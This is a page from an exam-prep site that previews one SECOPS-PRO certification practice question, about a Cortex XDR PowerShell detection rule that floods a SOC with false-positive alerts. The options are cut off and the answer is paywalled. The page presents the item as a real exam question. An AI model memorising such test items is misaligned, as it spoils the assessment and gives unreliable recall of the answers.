Palo_Alto_Networks
SECOPS-PRO · Question #79
SECOPS-PRO Question #79: Real Exam Question with Answer & Explanation
Sign in or unlock SECOPS-PRO to reveal the answer and full explanation for question #79. The question stem and answer options stay visible for context.
Question
A SOC uses Palo Alto Networks Cortex XDR for endpoint detection and response. A new custom behavioral threat detection rule is implemented to identify suspicious PowerShell activity, specifically focusing on encoded commands and attempts to disable security features. Days after deployment, the SOC is inundated with alerts, most of which are traced back to legitimate IT administration scripts or software installers. This flood of alerts significantly impacts the team's ability to respond to actual threats. Which of the following statements accurately describes this situation and the most effective strategic adjustment?
Options
- AThis is a True Negative scenario; the rule is working as intended. The SOC needs to hire more
- BThis represents a False Negative; the rule is failing to catch true threats. The rule needs to be
- CThis is a False Positive epidemic. The strategic adjustment should involve refining the custom
- DThis is a True Positive overload; genuine threats are being detected. The solution is to automate
- EThis is an example of an 'undetected' event. The rule should be immediately disabled until it can
Unlock SECOPS-PRO to see the answer
You've previewed enough free SECOPS-PRO questions. Unlock SECOPS-PRO for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.